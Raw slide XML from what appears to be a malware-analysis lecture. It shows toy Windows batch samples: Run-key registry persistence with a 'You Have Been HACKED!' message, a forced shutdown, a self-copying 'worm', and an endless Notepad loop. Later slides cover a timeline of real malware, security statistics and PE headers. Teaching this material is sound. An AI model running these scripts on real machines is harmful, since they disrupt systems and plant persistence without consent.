                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c:windowswimn32.bat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echo end&gt;&gt;c:windowswimn32.bat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hkey_local_machinesoftwaremicrosoftwindowscurrentv</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ersionrun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WINDOWsAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg_sz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /d c:windowswimn32.bat /f</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hkey_current_usersoftwaremicrosoftwindowscurrentve</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rsionrun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CONTROLexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg_sz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /d c:windowswimn32.bat /f</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echo You Have Been HACKED!</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PAUSE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816707" y="2827743"/>
            <a:ext cx="4306317" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt; log off the computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@echo off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shutdown -r</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4469063"/>
            <a:ext cx="5292080" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt; Simple Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@echo off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Malwares\virus.bat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Malwares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Malwares\virus.bat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418426" y="3843406"/>
            <a:ext cx="4726743"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none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>SAPI.SpVoice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>”).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Speak”I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> love YOU”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163044" y="5187692"/>
            <a:ext cx="4997450" cy="1631950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;Endless Notepads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ECHO off</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:top</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>START %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SystemRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%\system32\notepad.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GOTO top</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290969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Real-world Impacts</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2010 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>attacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>Iran’s nuclear program and included the ability to impact hardware as well as software. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2011 — Zeus Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>detected in 2007, the author </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>released </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>the source code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>in 2011. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>Sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1"/>
              <a:t>Zbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>most successful pieces of botnet software in the world, impacting millions of machines. It is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2013 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Cryptolocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>early </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>programs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2014 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Backoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>Point-of-Sale (POS) systems to steal credit card data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2016 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Cerber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>One of the heavy-hitters in the ransomware sphere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>2017 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>brought </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>major computer systems in Russia, China, ­­the UK, and the US </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>down, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0"/>
              <a:t>locking people out of their data and demanding they pay a ransom or lose everything. The virus affected at least 150 countries, including hospitals, banks, telecommunications companies, warehouses, and many other industries.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1558682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Security reports</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>anking malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>2018: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>830 135 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>users attacked (steal money from bank accounts on the computers)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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276" y="2533157"/>
            <a:ext cx="6123068" cy="3540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3310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Security reports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Crypto-ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>2018: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>765 538 unique users attacked by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>encryptors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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2" y="2791134"/>
            <a:ext cx="6480718" cy="3310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0706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Security reports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Local infection </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201593"/>
            <a:ext cx="5749225" cy="5459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6493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 Headers and Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The PE header contains useful information for the malware analyst including</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830508803"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="658888" y="2420888"/>
          <a:ext cx="7729536" cy="3134360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2647812"/>
                <a:gridCol w="5081724"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Information revealed</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
